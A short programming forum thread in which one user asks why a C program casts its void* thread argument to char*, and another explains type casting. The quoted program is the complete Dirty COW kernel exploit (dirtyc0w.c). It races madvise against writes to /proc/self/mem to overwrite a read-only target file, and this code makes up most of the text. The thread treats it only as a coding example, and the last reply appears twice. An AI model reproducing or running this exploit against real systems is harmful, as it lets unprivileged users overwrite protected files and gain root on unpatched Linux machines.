C thread argument value - dirtyc0w.c

[tomduese]

hi, why uses the author this intermediate steps:

Code:

char *str;
str=(char*)arg

in the following code (especially in the second thread...) :

Code:

#include <stdio.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <unistd.h>
#include <sys/stat.h>
#include <string.h>
#include <stdint.h>

void *map;
int f;
struct stat st;
char *name;
 
void *madviseThread(void *arg)
{
  char *str;
  str=(char*)arg;
  int i,c=0;
  for(i=0;i<100000000;i++)
  {

    c+=madvise(map,100,MADV_DONTNEED);
  }
  printf("madvise %d\n\n",c);
}
 
void *procselfmemThread(void *arg)
{
  char *str;
  str=(char*)arg;

  int f=open("/proc/self/mem",O_RDWR);
  int i,c=0;
  for(i=0;i<100000000;i++) {

    lseek(f,(uintptr_t) map,SEEK_SET);
    c+=write(f,str,strlen(str));
  }
  printf("procselfmem %d\n\n", c);
}
 
 
int main(int argc,char *argv[])
{

  if (argc<3) {
  (void)fprintf(stderr, "%s\n",
      "usage: dirtyc0w target_file new_content");
  return 1; }
  pthread_t pth1,pth2;

  f=open(argv[1],O_RDONLY);
  fstat(f,&st);
  name=argv[1];


  map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
  printf("mmap %zx\n\n",(uintptr_t) map);

  pthread_create(&pth1,NULL,madviseThread,argv[1]);
  pthread_create(&pth2,NULL,procselfmemThread,argv[2]);

  pthread_join(pth1,NULL);
  pthread_join(pth2,NULL);
  return 0;
}

Best regards

Tom

[GReaper]

This is called "type casting", it convert one type into another. In this case, it converts a void pointer to a char pointer( unnecessary, compiles perfectly fine without it ).

[tomduese]

Ah, ok - thank you!!! ;-)

This is called "type casting", it convert one type into another. In this case, it converts a void pointer to a char pointer( unnecessary, compiles perfectly fine without it ).